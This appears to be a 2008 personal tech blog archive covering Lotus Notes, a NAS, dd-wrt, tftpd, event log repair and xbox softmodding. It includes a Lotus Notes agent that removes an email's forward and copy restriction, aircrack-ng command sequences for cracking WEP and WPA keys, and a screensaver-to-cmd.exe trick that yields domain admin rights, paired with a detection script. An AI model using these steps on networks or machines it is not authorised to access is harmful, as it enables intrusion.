Wednesday, 17 December 2008

Remove Prevent Copy / Forward / Print From Email In Lotus Notes

I had an issue today that required me to forward an email to a colleague for review. However, the sender had prevented copying, printing and forwarding of this particular email, and for one reason or another they were unable to resend it.

So I fired up Domino Designer and added the following agent to the "Actions" Menu of my mailfile.

I'm not going to even go into the morals and ethics of removing these so-called "security features" from emails, so please don't start going off on a rant.

FIELD $KeepPrivate := $KeepPrivate;
@If($KeepPrivate != "";
    @Prompt([OK]; "$KeepPrivate Flag Disabled";
        "The selected message can now be forwarded/copied!");
    @Prompt([OK]; "$KeepPrivate Flag Not found";
        "The selected message does not appear to have forwarding/copying disabled."))

Budget NAS Box

I recently picked up 2 of these in Maplin along with 2x 300GB IDE hard drives.

They work out of the box. Just plug in to your existing network, set up the share name and permissions via the built-in web interface, map the drive(s) on your workstation and you're good to go. The LANDisk can also act as a DHCP server.

I was having some intermittent issues with one of the devices locking up, so I updated the firmware. The chipset (Conceptronic CHD3NET) is the same as that used on some other devices, so I loaded the latest one I could find from here, including the bootloader.

The site also has a firmware loader to ease the update process.

One point to note is that the device formats the drive as FAT32, not EXT2 or NTFS. This may be an issue for you if you have files over 2GB.

Turn A Cheap Linksys Router Into A Powerful (almost) Enterprise Level Router

I picked up one of these off eBay for testing, a Linksys WRT54GS v1.1, and installed dd-wrt on it.

It's a fantastic firmware modification.
I can now set up as many VLANs as I want on both the LAN and WLAN interfaces.
It's also possible to put the wireless side of the device into client mode to create a bridge.
I am currently testing the OpenVPN aspect of the box. Take a look at for more info.

Tuesday, 2 December 2008

Wireless Pen-Testing

No Client WEP Cracking

This is a quick bullet-point, step-by-step guide to wireless password cracking.
Your wireless interface is "ath0"

airmon-ng stop ath0
ifconfig wifi0 down
macchanger --mac 00:11:22:33:44:55 wifi0
airmon-ng start wifi0
airodump-ng ath0
=== copy BSSID
airodump-ng -c 6 -w filename --bssid ath0
aireplay-ng -1 0 -a -h 00:11:22:33:44:55 ath0
aireplay-ng -3 -b -h 00:11:22:33:44:55 ath0
aircrack-ng -n 64 OR 128 -0 --bssid filename.cap


No Client Korek Chopchop Attack

airmon-ng stop ath0
ifconfig wifi0 down
macchanger --mac 00:11:22:33:44:55 wifi0
airmon-ng start wifi0
airodump-ng ath0
#ctrl+c when you see your network
#make a note of the bssid and chan
airodump-ng -c -w --bssid ath0
# leave it running ... open a new shell
aireplay-ng -1 0 -e -a -h 00:11:22:33:44:55 ath0
aireplay-ng -4 -h 00:11:22:33:44:55 -b -h 00:11:22:33:44:55 -k -l -y -w
# now to inject the ARP packet
aireplay-ng -2 -r ath0
# answer y when it asks "Use this packet ?"
# once you have enough packets start aircrack-ng
aircrack-ng -n 64 or 128 -z -f 1 -e -b *.cap


WPA-WPA2 Cracking

airmon-ng stop ath0
airmon-ng start wifi0
airodump-ng ath0
airodump-ng -c -w --bssid ath0
aireplay-ng -0 1 -a -c ath0
# Ctrl+C when you have the handshake
aircrack-ng -w -b .cap


WPA-WPA2 With Airolib-ng Databases

# make sure you have SQLite3 installed
# install it
# download and install latest dev version of aircrack

svn co aircrack-ng
cd aircrack-ng
gmake SQLITE=true
gmake SQLITE=true install

# create a new text file called ssidlist.txt
# enter the name of your network(s). One per line.
# the database will be created if it does not exist

airolib-ng testdb --import essid ssidlist.txt

# import your dictionary file into the database

airolib-ng testdb --import ascii passwd password.lst

# clean up the database to get rid of any errors

airolib-ng testdb clean all

# now to create the database

airolib-ng testdb batch

# once it says No free ssid found .... press Ctrl+C or it'll keep running.
# next verify the database. This will check about 1000 random PMKs

airolib-ng testdb verify

# verifies everything
airolib-ng testdb verify all

# now to crack the WPA/WPA2 key

airmon-ng stop ath0
airmon-ng start wifi0
airodump-ng ath0
airodump-ng -c -w --bssid ath0
aireplay-ng -0 1 -a -c ath0

# Ctrl+c .. when you have handshake

aircrack-ng -r testdb .cap

Running tftpd as a service on a windows machine

I'm using jounin's tftpd32 (download from here: ) for netbooting stations in places where I don't have UNIX servers, and found this tool very useful.

Here are my instructions for making it a Windows Service using MS instsrv.exe and srvany.exe from the Windows 2000 Resource Kit.

* Download tftpd
* Install tftpd on your system. I installed it in C:\Program Files\tftpd, and my explanation will be using this dir.
* Get the files instsrv.exe and srvany.exe from the Resource Kit and copy them to a directory on your system (I copied them to C:\Tools)
* Open a cmd (Start -> Run -> cmd) and do the following:
o c:
o cd \Tools
o instsrv tftpd c:\Tools\srvany.exe
* Open the registry (Start -> Run -> regedt32)
* Under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\tftpd : create a 'Parameters' key
* Under the above key, create a new 'String Value' with the name 'Application' of type REG_SZ and specify there C:\Program Files\tftpd\tftpd32.exe
* Close your running tftpd32 (if you have one) and check with netstat -a that nothing is listening on the UDP tftp port (69)
* Goto services (left click on "My Computer" -> Manage -> Services and Applications -> Services) and start the tftpd service.
* Check now with netstat -a that there is a service listening on the UDP tftp port; the output should look like this (the important line is the last):
Windows CMD

C:\Program Files\tftpd>netstat -a

Active Connections

Proto Local Address Foreign Address State
TCP localhost:epmap localhost:0 LISTENING
TCP localhost:microsoft-ds localhost:0 LISTENING
UDP localhost:bootps *:*
UDP localhost:tftp *:*

* That's it !

Windows Password Reset

Use Petter's disk to reset the MACHINE Administrator password to "no password".

Reboot, hit F8, and enter "Directory Service Recovery Mode". The machine will boot up as a standalone server without any Active Directory support.

When the login screen appears, hit CTRL-ALT-DEL and log in as "Administrator" with no password. This is the MACHINE Administrator account, and does not have the ability to modify anything specific involving the Active Directory information, although it can backup and restore the physical files which contain the AD databases.

Run "regedit". Navigate to HKEY_USERS\.Default\Control Panel\Desktop and change the following values:
Value               Original    Change to
SCRNSAVE.EXE        logon.scr   cmd.exe
ScreenSaveTimeout   900         15

Reboot normally. When the box appears asking you to hit CTRL-ALT-DEL to log in, just wait. After 15-30 seconds you will see a command prompt appear (since that is the screensaver.)

In the command prompt, type the following command:
C:\WINNT\system32> MMC DSA.MSC

This should bring up the management console where you can edit users' passwords, including the password for the Administrator account. If you type this command and it doesn't work, wait 30 seconds and try it again. This happened to me, it sounded like it was still in the process of loading drivers into memory in the background...

If this doesn't work after waiting the 30 seconds... realize that THIS IS A COMMAND PROMPT WITH FULL DOMAIN ADMINISTRATOR RIGHTS, and you're running a command ("MMC.EXE") with another filename ("DSA.MSC") as an argument. If it "just plain doesn't work", maybe you need to locate these two files and type them in as full path names. Maybe something like "C:\WINNT\SYSTEM32\MMC.EXE C:\WINNT\SYSTEM32\DSA.MSC".

If you know absolutely nothing about how to use a command line, then reboot into DSR Mode, log in as Administrator, and use the graphical "Find Files" thingy to find the files, and write down their locations. Then try it again (reboot and wait for the command line, etc.)

After resetting the Administrator password, exit the management console and type the command EXIT in the command prompt window.

Hit CTRL-ALT-DEL and log into the DOMAIN Administrator account using the new password!

Don't forget to undo the changes you made to the registry, or you will always have a command prompt with Domain Administrator rights appear whenever somebody logs out.
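An added audit check, not from the original post, that looks for exactly the two changes this procedure makes under HKEY_USERS\.DEFAULT\Control Panel\Desktop (a SCRNSAVE.EXE that is not a .scr file, and a very short ScreenSaveTimeout). The 60-second floor is an assumption; the live registry read only runs on Windows.

```python
import sys

# Stock values from the post's table: logon.scr with a 900 second timeout.
# The 60 second floor below is an assumption, not a documented Windows limit.
EXPECTED_SCR = "logon.scr"
EXPECTED_TIMEOUT = 900
MIN_SANE_TIMEOUT = 60


def assess_logon_screensaver(scrnsave, timeout):
    """Return a list of findings; an empty list means the values look stock."""
    findings = []
    if scrnsave:
        # Keep only the file name, whether the value is bare or a full quoted path.
        name = scrnsave.strip().strip('"').replace("/", "\\").rsplit("\\", 1)[-1].lower()
        if not name.endswith(".scr"):
            findings.append(f"SCRNSAVE.EXE runs a non-screensaver binary: {scrnsave}")
        elif name != EXPECTED_SCR:
            findings.append(f"SCRNSAVE.EXE is {name}, expected {EXPECTED_SCR}")
    secs = None
    if timeout is not None:
        try:
            secs = int(str(timeout).strip())  # stored as REG_SZ, so it arrives as text
        except ValueError:
            findings.append(f"ScreenSaveTimeout is not numeric: {timeout!r}")
    if secs is not None and secs < MIN_SANE_TIMEOUT:
        findings.append(f"ScreenSaveTimeout is {secs}s (stock value {EXPECTED_TIMEOUT})")
    return findings


def read_live_values():
    """Read both values from the live registry; returns (None, None) off Windows."""
    if sys.platform != "win32":
        return None, None
    import winreg  # standard library, Windows only
    key = winreg.OpenKey(winreg.HKEY_USERS, r".DEFAULT\Control Panel\Desktop")

    def get(name):
        try:
            return winreg.QueryValueEx(key, name)[0]
        except FileNotFoundError:
            return None

    return get("SCRNSAVE.EXE"), get("ScreenSaveTimeout")


if __name__ == "__main__":
    if sys.platform == "win32":
        print(assess_logon_screensaver(*read_live_values()) or ["logon screensaver looks stock"])
    else:
        # constructed values, copied from the post's "Change to" column
        print(assess_logon_screensaver("cmd.exe", "15"))
```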

Procedure For Recovering A Corrupted Event Log

On an active system, new events are written to the end of the log file. When a soft shutdown is performed, the log data is realigned to its proper location. If a hard shutdown or live acquisition is performed, this data may not have been properly flushed, creating an unreadable log file. The result is a "log file is corrupt" error.

Steps to Recover:

1. Copy out the Windows event log you are interested in (e.g. SecEvent.Evt, SysEvent.Evt or AppEvent.Evt).

2. Before proceeding, try to open the file with your event viewer. If you get the message, “The event log is corrupted”, then continue with the following steps.

3. Open the Event Log with a HEX file editor (e.g. UltraEdit, HexEdit, WinHex, etc).

4. Search for the ASCII (TEXT) string: 3333DDDD.

5. This puts you right in the middle of the HEX string: 11 11 11 11 22 22 22 22 33 33 33 33 44 44 44 44

6. The “11 11 11 …” hex string is the start of the log file header. The four bytes immediately preceding the “11 11 11…” should be (hex) 28 00 00 00. This is the Record Length (40 bytes).

7. Immediately following the “… 44 44 44 44” you should see a 4-byte sequence: 30 00 00 00. This is the status flag.

30 00 00 00 is “dirty”, meaning the log file has not been flushed. 01 00 00 00 is “clean”.

If you see anything else, it is probably the offset location from the start of the next record to be written to the log. You may still proceed, it can still work.

8. Make a note of the next 4-bytes. This is the ALLOCATED SIZE of the log file.

9. Make a note of the next 4-bytes. This is the NUMBER OF ACTIVE RECORDS in the log file.

10. Next, go back to the start of the log file. Now you will start manually filling in the log file header.

11. Check the first 4-bytes of the file, it should be: 30 00 00 00; If not, change it.

12. Next, go to offset 20 (Byte offset count starts at ZERO)

13. Type in the ALLOCATED SIZE bytes

14. This should put you at byte #24

15. Type in the NUMBER OF ACTIVE RECORDS bytes

16. Following this (at offset 28) should be: 01 00 00 00 (if not, change it)

17. Go to offset 36, change to: 08 00 00 00.

18. That’s it! You should now be able to open the log file with your event viewer.
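The same repair done programmatically, as an added example that is not part of the original post: it finds the 40-byte record by the 11 11 … 44 44 marker (the ASCII "3333DDDD" the hex-editor search hits is bytes 33 33 33 33 44 44 44 44) and writes the header dwords exactly as steps 11 to 17 describe. The sample log is constructed to exercise it, not a real SecEvent.Evt.

```python
import struct

# Offsets and values are the ones the post walks through; the sample log is constructed.
EOF_MARKER = bytes.fromhex("11111111222222223333333344444444")
EOF_RECORD_LEN = 0x28  # the "28 00 00 00" right before the marker (step 6)
HEADER_LEN = 0x30      # the "30 00 00 00" expected at file offset 0 (step 11)


def find_eof_record(data: bytes) -> int:
    """Offset of the 40-byte record carrying the 11 11 .. 44 44 marker (steps 4-6)."""
    pos = data.find(EOF_MARKER)
    if pos < 4:
        raise ValueError("marker 11 11 11 11 ... 44 44 44 44 not found")
    rec = pos - 4
    if struct.unpack_from("<I", data, rec)[0] != EOF_RECORD_LEN:
        raise ValueError("dword before the marker is not 28 00 00 00")
    return rec


def repair_header(data: bytes) -> bytes:
    """Rewrite the file header from that record, following steps 7 to 17."""
    rec = find_eof_record(data)
    # Three dwords after the marker, in the post's terms: status flag (30 = dirty,
    # 01 = clean, anything else still worth trying), ALLOCATED SIZE, NUMBER OF ACTIVE RECORDS.
    _status, alloc_size, active_records = struct.unpack_from("<III", data, rec + 20)
    out = bytearray(data)
    struct.pack_into("<I", out, 0, HEADER_LEN)       # step 11
    struct.pack_into("<I", out, 20, alloc_size)      # steps 12-13
    struct.pack_into("<I", out, 24, active_records)  # steps 14-15
    struct.pack_into("<I", out, 28, 1)               # step 16: 01 00 00 00
    struct.pack_into("<I", out, 36, 8)               # step 17: 08 00 00 00
    return bytes(out)


def header_fields(data: bytes) -> dict:
    """The five header dwords the procedure touches, keyed by byte offset."""
    return {off: struct.unpack_from("<I", data, off)[0] for off in (0, 20, 24, 28, 36)}


def make_sample_dirty_log() -> bytes:
    """Constructed log: blank header, 200 bytes of record space, then the EOF record."""
    header = bytearray(HEADER_LEN)
    header[4:8] = b"LfLe"                  # signature seen at offset 4 of real .evt files
    struct.pack_into("<I", header, 36, 1)  # stale flag dword that the repair overwrites
    body = bytes(200)
    eof_offset = HEADER_LEN + len(body)    # 248
    eof = struct.pack("<I", EOF_RECORD_LEN) + EOF_MARKER + struct.pack(
        "<IIIII", 0x30, eof_offset, 42, 1, EOF_RECORD_LEN)  # dirty, size, 42 records
    return bytes(header) + body + eof


if __name__ == "__main__":
    print(header_fields(repair_header(make_sample_dirty_log())))
```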

How to softmod your xbox


This may not be the best way, but it's worked for me.

You're going to need the following:

I don't need to say xbox, do I?? ... Internet connection?? ... Hard drive??

xbox memory card. I've heard that M$ branded ones work best, I used a Mega-X-Key only cos I have one gathering dust in my box of computer bits.

Based on what other sites mention..
Any version of Tom Clancy's Splinter Cell
The original version of 007: Agent Under Fire or the Platinum Hits Agent Under Fire with the Serial #: 1448517 (NOT 1448527)
Mech Assault with the Serial #: MS02301L on the inner ring of the game CD
IRC Client
FTP Client

I picked up a copy of Splinter Cell in the Pre-Owned games section of a local store for 3 quid.

Next you're going to need an All-In-One Exploit package, which you can get from xbins on IRC.
If you don't know how to connect, google "xbins"; there's LOTS of sites out there that explain it.

Ok ..... the voice in my head is telling me to tell you.

I Used mIRC
Go to
Download mIRC
Install mIRC

You're also going to need an FTP client and WinRAR, WinZip, PowerArchiver or 7zip.
I used 7zip, cos it's free.

Filezilla, SmartFTP, WS-FTP, FlashFXP, there's tons out there ... pick one.

Start IRC ... connect to an EFNet server, any one will do.


When you're connected, type

/j #xbins
/msg xbins !list

You'll get a private message from Xbins giving you the location and login to the FTP server.

The voice has told me not to tell you how to use blah blah FTP client.

But connect to the ftp server that Xbins gave you.

Browse to /XBOX/exploits/_Packages/Softmod Installer Deluxe/

Extract the following files

and copy them to your memory card or Mega-X-Key .... its attached to the PC right ?

Plug the card/key into your xbox and copy the game saves over to your xbox.

Stick in the Splinter Cell game and start a new game.
Select the save game called Linux

After a few seconds, could be anywhere between 5-10 ... don't worry about the blank screen, it's normal.

Select the option , Create MS Backup, this will backup the entire contents of your C:\ to

Create mod backup is supposed to backup your eeprom.
It didn't backup mine ... it just backed up the c drive again

The nice thing about the save game exploit is that you can ftp stuff to and from your xbox.

Instead of installing the softmod on my retail hard drive, I ftp'd the contents of C and E to a temp folder on my computer.

I downloaded xboxhdm v1.9 ... xbins (see IRC section) /XBOX/Operating Systems/linux/distributions/xboxhdm/
followed the instructions in the readme and created an xbox hd maker CD

Copy the contents of your xbox C Drive backup to xboxhdm\linux\C and the xbox E to xboxhdm\linux\E and the eeprom backup to xboxhdm\linux\eeprom

When all the copying has finished ... make-iso-win.bat

Burn the ISO with your fav CD Writer app ... I used Nero (It came free with the burner)

shut down your pc, disconnect all drives except the cd rom!

set the drive you're going to put in your xbox to CS (Cable Select)

Connect it to IDE 1 Master.

Here comes the voice again .... xboxhdm ... just boot off the CD

Time Passes

Remove the drive from your xbox

Stick in the new one.

Fire up splinter cell

load up the Linux save game.

install the softmod ... this way if it goes belly up ... you can just pop in the retail drive and its all ok again, make sure you copied eeprom.bin over to the eeprom folder !

copied over an updated version of XBMC or DVD2XBOX to e\apps

Now I was a wee bit upset to find that F was not as big as I thought it was going to be, I put a 250GB drive in there.

Google time passes

Found XBpartitioner_1.0RC1.rar ... xbins

unrar ... copied XBpartitioner to the xbox.

Evox did not see it as an app ... prob some setting in evox.ini
Fired up xbmc went to file browsed to e\apps\XBpartitioner and launched it from there !

voice is saying read the help file. I chose the option of having F 240GB
format drive
reboot xbox .... just because.